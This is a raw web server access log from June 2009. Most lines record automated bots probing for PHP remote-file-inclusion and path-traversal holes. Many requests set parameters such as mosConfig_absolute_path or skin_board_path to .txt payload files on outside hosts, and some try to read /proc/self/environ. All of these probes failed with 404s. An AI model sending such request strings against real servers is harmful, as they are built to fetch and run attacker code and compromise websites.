83.149.105.122 - - [06/Jun/2009:06:47:53 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.149.105.122 - - [06/Jun/2009:06:47:59 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:48:14 -0400] "GET //error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:48:14 -0400] "GET /logs//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:48:14 -0400] "GET /logs/access_log.Q109053100//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:48:17 -0400] "GET /logs//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:48:17 -0400] "GET //error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:48:19 -0400] "GET /logs/access_log.Q109053100//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.73.144.26 - - [06/Jun/2009:06:48:19 -0400] "GET /logs/error_log.Q109052800//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:48:35 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.810"
125.206.170.126 - - [06/Jun/2009:06:48:46 -0400] "GET /logs/access_log.Q109053100//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:48:46 -0400] "GET /logs//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:48:46 -0400] "GET //error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:49:01 -0400] "GET /logs//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:49:02 -0400] "GET /logs/access_log.Q109053100%20%20//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:49:02 -0400] "GET //error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
66.249.71.14 - - [06/Jun/2009:06:49:28 -0400] "GET /images/items/EcOm/__MACOSX/ HTTP/1.1" 200 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.206.170.126 - - [06/Jun/2009:06:49:51 -0400] "GET /logs/access_log.Q109052900%20%20//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:49:58 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:49:58 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:49:58 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:06:50:30 -0400] "GET /logs/access_log.Q108062200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:06:50:30 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:50:50 -0400] "GET /logs/access_log.Q109052100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:51:11 -0400] "GET //error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:51:11 -0400] "GET /logs//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:51:11 -0400] "GET /logs/access_log.Q109053100//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:51:12 -0400] "GET //error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:51:12 -0400] "GET /logs//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:51:12 -0400] "GET /logs/access_log.Q109053100//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:51:32 -0400] "GET /logs/access_log.Q109052900//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:06:51:39 -0400] "GET /logs/access_log.Q109052900//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:51:43 -0400] "GET /logs//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:51:43 -0400] "GET //error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:51:43 -0400] "GET /logs/access_log.Q109053100//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:52:01 -0400] "GET /logs/access_log.Q109052900//error.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:52:16 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:52:16 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:52:16 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:06:52:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [06/Jun/2009:06:52:32 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:52:32 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:52:32 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:52:32 -0400] "GET /logs/access_log.Q109052100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:52:50 -0400] "GET /logs/access_log.Q109052100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
83.149.105.122 - - [06/Jun/2009:06:52:56 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.149.105.122 - - [06/Jun/2009:06:52:56 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.149.105.122 - - [06/Jun/2009:06:52:56 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.229.183.76 - - [06/Jun/2009:06:53:35 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 245 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
213.229.183.76 - - [06/Jun/2009:06:53:35 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 219 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
201.232.54.48 - - [06/Jun/2009:06:53:43 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:53:50 -0400] "GET /logs/access_log.Q109052100%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.220.196.44 - - [06/Jun/2009:06:54:01 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://r-shooter.com/bbs/data/test.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
118.220.196.44 - - [06/Jun/2009:06:54:01 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://r-shooter.com/bbs/data/test.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.249.36.194 - - [06/Jun/2009:06:54:36 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Jun/2009:06:54:41 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Jun/2009:06:54:47 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Jun/2009:06:54:47 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:54:47 -0400] "GET /logs/access_log.Q109051600%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:54:47 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:54:47 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.6.232.171 - - [06/Jun/2009:06:54:53 -0400] "GET /logs/error_log.Q109042900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:55:04 -0400] "GET /logs/access_log.Q109052100%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:06:55:05 -0400] "GET /images/Office%20Supply/LCALEN.HTM HTTP/1.0" 200 7957 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.249.36.194 - - [06/Jun/2009:06:55:06 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:55:06 -0400] "GET /logs/access_log.Q109052100%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
213.229.183.76 - - [06/Jun/2009:06:55:30 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
78.111.80.18 - - [06/Jun/2009:06:55:48 -0400] "GET /logs/error_log.Q109051600%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
71.50.214.67 - - [06/Jun/2009:06:56:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
71.50.214.67 - - [06/Jun/2009:06:56:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
71.50.214.67 - - [06/Jun/2009:06:56:07 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
71.50.214.67 - - [06/Jun/2009:06:56:07 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
78.111.80.18 - - [06/Jun/2009:06:56:48 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:06:57:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.111.80.18 - - [06/Jun/2009:06:57:28 -0400] "GET /logs/error_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:06:57:58 -0400] "GET /logs/access_log.Q109052600//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:58:04 -0400] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:58:04 -0400] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:58:04 -0400] "GET /logs/access_log.Q109051800%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:58:14 -0400] "GET /logs/access_log.Q109051800///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:58:14 -0400] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:58:14 -0400] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:58:47 -0400] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:58:47 -0400] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:58:47 -0400] "GET /logs/access_log.Q109051800///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:59:10 -0400] "GET /logs/access_log.Q109051800///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:59:38 -0400] "GET /logs/access_log.Q109051800%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
77.221.130.2 - - [06/Jun/2009:07:00:05 -0400] "GET /logs/access_log.Q109052300//manager/admin/u_ins.php?MGR=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.2 - - [06/Jun/2009:07:00:05 -0400] "GET /logs//manager/admin/u_ins.php?MGR=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.2 - - [06/Jun/2009:07:00:05 -0400] "GET //manager/admin/u_ins.php?MGR=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.2 - - [06/Jun/2009:07:00:06 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.221.130.2 - - [06/Jun/2009:07:00:06 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.221.130.2 - - [06/Jun/2009:07:00:06 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.221.130.2 - - [06/Jun/2009:07:00:06 -0400] "GET /logs/access_log.Q109052300//manager/admin/u_ins.php?MGR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 249 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:07:00:06 -0400] "GET /logs//manager/admin/u_ins.php?MGR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 227 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:07:00:06 -0400] "GET //manager/admin/u_ins.php?MGR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 222 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:07:00:06 -0400] "GET /logs/access_log.Q109052300//manager/admin/u_ins.php?MGR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 249 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:07:00:06 -0400] "GET //manager/admin/u_ins.php?MGR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 222 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:07:00:06 -0400] "GET /logs//manager/admin/u_ins.php?MGR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 227 "-" "XXXXXX"
218.249.36.194 - - [06/Jun/2009:07:00:25 -0400] "GET /logs/access_log.Q109052500%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:07:01:31 -0400] "GET /logs/access_log.Q109051800%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:07:01:50 -0400] "GET /logs/access_log.Q109052500///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
213.229.183.76 - - [06/Jun/2009:07:02:20 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
213.229.183.76 - - [06/Jun/2009:07:02:20 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
213.229.183.76 - - [06/Jun/2009:07:02:21 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
77.221.130.2 - - [06/Jun/2009:07:02:22 -0400] "GET /logs/error_log.Q109052300//manager/admin/u_ins.php?MGR=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.221.130.2 - - [06/Jun/2009:07:02:22 -0400] "GET /logs/error_log.Q109052300/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [06/Jun/2009:07:02:22 -0400] "GET /logs/error_log.Q109052300//manager/admin/u_ins.php?MGR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 248 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:07:02:23 -0400] "GET /logs/error_log.Q109052300//manager/admin/u_ins.php?MGR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 248 "-" "XXXXXX"
83.149.105.122 - - [06/Jun/2009:07:02:25 -0400] "GET /logs/access_log.Q109010700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:07:02:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.149.105.122 - - [06/Jun/2009:07:02:31 -0400] "GET /logs/access_log.Q108062200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:07:02:33 -0400] "GET /logs/access_log.Q109052500%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
